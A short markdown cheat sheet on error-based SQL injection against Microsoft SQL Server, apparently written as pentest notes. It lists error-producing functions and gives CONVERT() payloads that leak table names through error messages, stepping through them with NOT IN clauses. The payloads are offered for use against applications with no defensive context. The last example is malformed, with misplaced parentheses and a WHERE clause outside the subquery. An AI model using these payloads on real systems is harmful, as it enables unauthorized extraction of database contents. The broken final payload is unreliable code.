# Error Based SQLi general tips

## MSSQL

Functions which easily produce errors is MSSQL

* convert()
* file_name()
* db_name()
* col_name()
* filegroup_name()
* object_name()
* schema_name()
* type_name()
* cast()

Example usage of `convert()`

`CONVERT(int,(select top(1) table_name from information_schema.tables))`

Selects the top table name from information schema, and then tries to convert it to int, which is impossible.  Will output an error with the contents of the query.

You can then iterate with the same query but with `NOT IN`

`CONVERT(int,(select top(1) table_name from information_schema.tables WHERE table_name NOT IN ('users')))`

Assuming the first table we find is 'users', we would put that in our next inject, and it would output the next table in the list. The next iteration would look something like:

`CONVERT(int,(select top(1) table_name from information_schema.tables)) WHERE table_name NOT IN ('users','posts')))`

An so on...





